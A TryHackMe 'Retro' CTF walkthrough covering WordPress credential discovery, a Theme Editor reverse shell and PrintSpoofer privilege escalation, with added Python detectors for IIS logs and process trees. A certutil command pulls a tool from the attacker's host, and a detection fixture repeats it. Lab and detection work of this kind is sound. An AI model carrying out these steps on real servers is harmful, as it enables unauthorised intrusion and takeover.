TryHackMe — Retro Write Up
Challenge Link: https://tryhackme.com/room/retro
(This write-up does not follow the intended path given by the hints.)
Table of Contents
1. Enumeration
2. Initial Access
3. Privilege Escalation
Enumeration
After starting the machine on TryHackMe, we begin our enumeration phase by kicking off an nmap scan.
Since the room specifies that the machine does not respond to ping, we include the -Pn flag so nmap skips host discovery. The full command is:
nmap -T4 -p- -vv -A -Pn <target_ip>
Our nmap scan reveals that two ports are open: 80 and 3389.
We first check Exploit-DB for any vulnerabilities in the Microsoft IIS httpd 10.0 version identified, but nothing turns up. Since port 80 is open, we continue by enumerating the web service further. Visiting the webpage shows only the default Windows IIS landing page.
Let’s continue enumerating by running nikto and gobuster. The scans are:
nikto -h http://<target_ip>/
gobuster dir -u http://<target_ip>/ -w ../dirbuster/directory-list-2.3-medium.txt -t 100
The initial nikto scan doesn’t turn up anything too interesting, but the gobuster scan reveals the directory we are looking for.
Visiting the newly found directory and viewing the page source reveals it is a WordPress site. Let’s run another nikto scan on this too (we could also run wpscan, but it wasn’t necessary here). While the second nikto scan is running, let’s manually go through the site and see if we can find anything interesting…
The posts on the site were written by a user named Wade. We also come across a post with a comment by Wade, leaving a note to himself.
Since we now have a username and, possibly, a password, let’s try to log in with these credentials…
From any of the posts on the right-hand side of the page, we can find the login page (or, because it is a WordPress site, we can guess /wp-login.php).
Heading to the login page, we try the credentials…
On a side note, let’s look back at our second nikto scan. One interesting line stood out, involving the directory that we found…
Let’s go there and see what we find (leaving off the >; in the URL). It appears to be the entire structure of the website.
We can also find the previous comment in here to get Wade’s password.
And following this link to view the comments…
Getting back on track now…
Initial Access
We have successfully logged in as the user Wade and are presented with the admin dashboard for the WordPress site. A common way to get a reverse shell from here is to use the Theme Editor to modify a .php file.
Within the Theme Editor, we can pick any .php file that we can modify…
We’ll use the archive.php file here. You can add in your favorite PHP reverse shell, noting that the machine is running Windows.
With our netcat listener waiting patiently, we visit:
../wp-content/themes/90s-retro/archive.php
to have our PHP code executed.
Upon visiting the page, we get our reverse shell as iis apppool\retro.
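Both halves of the technique above leave traces in the IIS request log: the Theme Editor is reached at /wp-admin/theme-editor.php (a GET to open it, a POST to save a file), and a theme template such as archive.php is then requested directly, which a browser normally never does because WordPress includes those files server-side. The following is an added example, not code from the original write-up, that pulls both traces out of W3C-format IIS logs. The log lines, timestamps, client IP and the /site install prefix are constructed placeholders; only the 90s-retro theme name and the endpoint paths come from the write-up.

```python
"""Flag Theme Editor use and direct hits on theme .php files in IIS W3C logs.

Added example, not code from the original write-up. The log lines, IPs,
timestamps and the /site prefix are constructed placeholders.
"""
import re
from dataclasses import dataclass

THEME_EDITOR = "/wp-admin/theme-editor.php"
# Theme PHP templates, e.g. /wp-content/themes/90s-retro/archive.php
THEME_PHP = re.compile(r"^/wp-content/themes/[^/]+/.+\.php$", re.IGNORECASE)

OPENED = "Theme Editor opened"
SAVED = "theme file saved via Theme Editor"
DIRECT = "direct request to a theme PHP template"

# Constructed sample log in IIS W3C format (not captured from the machine).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2023-01-01 10:00:01 GET /site/ - 10.0.0.5 200
2023-01-01 10:00:07 GET /site/wp-login.php - 10.0.0.5 200
2023-01-01 10:00:12 POST /site/wp-login.php - 10.0.0.5 302
2023-01-01 10:00:30 GET /site/wp-admin/theme-editor.php file=archive.php&theme=90s-retro 10.0.0.5 200
2023-01-01 10:00:55 POST /site/wp-admin/theme-editor.php - 10.0.0.5 302
2023-01-01 10:01:10 GET /site/wp-content/themes/90s-retro/style.css - 10.0.0.5 200
2023-01-01 10:01:20 GET /site/wp-content/themes/90s-retro/archive.php - 10.0.0.5 200
"""


@dataclass(frozen=True)
class Finding:
    time: str
    client: str
    method: str
    uri: str
    reason: str


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]      # the header can change mid-file; honour the latest one
            continue
        if not raw.strip() or raw.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log record appears before any #Fields header")
        values = raw.split()
        if len(values) != len(fields):
            continue                      # malformed record: skip rather than crash
        yield dict(zip(fields, values))


def wp_relative(path, site_prefix):
    """Strip the sub-directory WordPress is installed under, if any."""
    prefix = site_prefix.rstrip("/")
    if prefix and path.lower().startswith(prefix.lower() + "/"):
        return path[len(prefix):]
    return path


def find_theme_tampering(text, site_prefix=""):
    """Return a Finding for every Theme Editor request or direct theme .php hit."""
    findings = []
    for rec in parse_w3c(text):
        path = wp_relative(rec["cs-uri-stem"], site_prefix)
        method = rec["cs-method"].upper()
        if path.lower() == THEME_EDITOR:
            reason = SAVED if method == "POST" else OPENED
        elif THEME_PHP.match(path):
            reason = DIRECT
        else:
            continue
        findings.append(Finding(f"{rec['date']} {rec['time']}", rec["c-ip"],
                                method, rec["cs-uri-stem"], reason))
    return findings


def clients_with_edit_then_hit(findings):
    """Clients that saved a theme file and afterwards requested a theme .php directly."""
    saved_at = {}
    for f in findings:
        if f.reason == SAVED:
            saved_at.setdefault(f.client, f.time)   # timestamps are ISO-like, so strings compare in order
    return sorted({f.client for f in findings
                   if f.reason == DIRECT and f.client in saved_at and f.time > saved_at[f.client]})


if __name__ == "__main__":
    found = find_theme_tampering(SAMPLE_LOG, site_prefix="/site")
    for f in found:
        print(f.time, f.client, f.method, f.uri, "->", f.reason)
    print("edit-then-execute clients:", clients_with_edit_then_hit(found))
```

The site prefix matters: WordPress installed under a sub-directory (as the gobuster result implies here) shifts every path, so the matcher compares against the WordPress-relative path. On the mitigation side, WordPress removes the Theme Editor entirely when wp-config.php sets the DISALLOW_FILE_EDIT constant to true, which turns the POST above into an impossible event rather than a rare one.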
Privilege Escalation
Enumerating the machine for a privilege escalation vector is short-lived. We can run whoami /priv to see that we have SeImpersonatePrivilege enabled.
There are a few well-known ways to escalate privileges with SeImpersonatePrivilege enabled. For example, from HackTricks…
For this write-up, we will use PrintSpoofer (https://github.com/itm4n/PrintSpoofer) and transfer it to the target with certutil:
certutil -urlcache -split -f http://<host_ip>:<port>/PrintSpoofer.exe
Running systeminfo reveals the machine is x64, but PrintSpoofer64.exe doesn’t run. So we try again with PrintSpoofer32.exe, and it works.
We are now nt authority\system and can retrieve the user and root flags.
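From the blue-team side, the whole chain in this write-up shows up as an unusual process tree: the IIS worker process (w3wp.exe, running as the app-pool identity iis apppool\retro) spawns a shell, and that shell runs certutil with -urlcache to pull a binary down. The following is an added example, not code from the original write-up, that applies three rules to Sysmon-style process-creation events: a shell whose parent is w3wp.exe, certutil used as a downloader, and any process whose ancestry leads back to w3wp.exe. The event list, PIDs, the download host and the non-IIS user are constructed placeholders.

```python
"""Spot the IIS worker -> shell -> certutil download chain in process telemetry.

Added example, not code from the original write-up. EVENTS is a constructed
list of Sysmon Event ID 1-style records; PIDs, the download host and the
non-IIS user are placeholders.
"""
from collections import defaultdict

IIS_WORKER = "w3wp.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed events: one IIS worker that spawns a shell which downloads a file,
# plus a normal interactive session using certutil for something benign.
EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 600,
     "Image": r"C:\Windows\System32\svchost.exe",
     "User": "NT AUTHORITY\\SYSTEM", "CommandLine": "svchost.exe -k iissvcs"},
    {"ProcessId": 4120, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "User": "IIS APPPOOL\\retro", "CommandLine": "w3wp.exe -ap \"retro\""},
    {"ProcessId": 5000, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\cmd.exe",
     "User": "IIS APPPOOL\\retro", "CommandLine": "cmd.exe"},
    {"ProcessId": 5100, "ParentProcessId": 5000,
     "Image": r"C:\Windows\System32\certutil.exe",
     "User": "IIS APPPOOL\\retro",
     "CommandLine": "certutil -urlcache -split -f http://HOST_PLACEHOLDER/PrintSpoofer.exe"},
    {"ProcessId": 2000, "ParentProcessId": 900,
     "Image": r"C:\Windows\explorer.exe",
     "User": "CONSTRUCTED\\user1", "CommandLine": "explorer.exe"},
    {"ProcessId": 6000, "ParentProcessId": 2000,
     "Image": r"C:\Windows\System32\certutil.exe",
     "User": "CONSTRUCTED\\user1", "CommandLine": "certutil -hashfile report.pdf SHA256"},
]


def image_name(event):
    """Lower-cased file name of the process image."""
    return event["Image"].rsplit("\\", 1)[-1].lower()


def ancestors(pid, by_pid):
    """Walk ParentProcessId links upward; stop at an unknown PID or a cycle."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent_pid = by_pid[pid]["ParentProcessId"]
        if parent_pid not in by_pid:
            return
        yield by_pid[parent_pid]
        pid = parent_pid


def detect(events):
    """Return {pid: [reasons]} for every event that trips at least one rule."""
    # Real telemetry should key on ProcessGuid: PIDs are reused over time.
    by_pid = {e["ProcessId"]: e for e in events}
    hits = defaultdict(list)
    for ev in events:
        name = image_name(ev)
        pid = ev["ProcessId"]
        parent = by_pid.get(ev["ParentProcessId"])
        # Rule 1: an IIS worker process has no business starting a shell.
        if parent is not None and image_name(parent) == IIS_WORKER and name in SHELLS:
            hits[pid].append("shell spawned by IIS worker")
        # Rule 2: certutil -urlcache fetches from a URL; flag it wherever it appears.
        if name == "certutil.exe" and "-urlcache" in ev["CommandLine"].lower():
            hits[pid].append("certutil used as a downloader")
        # Rule 3: anything descending from w3wp.exe, however many hops away.
        if name != IIS_WORKER and any(image_name(a) == IIS_WORKER for a in ancestors(pid, by_pid)):
            hits[pid].append("descends from IIS worker")
    return dict(hits)


if __name__ == "__main__":
    for pid, reasons in detect(EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Rule 3 is the one that survives attacker variation: whichever shell or download tool is used, it still hangs off w3wp.exe in the tree, and an app-pool identity such as iis apppool\retro should not be running anything but the worker itself. The benign certutil -hashfile run under the interactive user trips none of the rules, which is the false-positive case worth keeping in the sample.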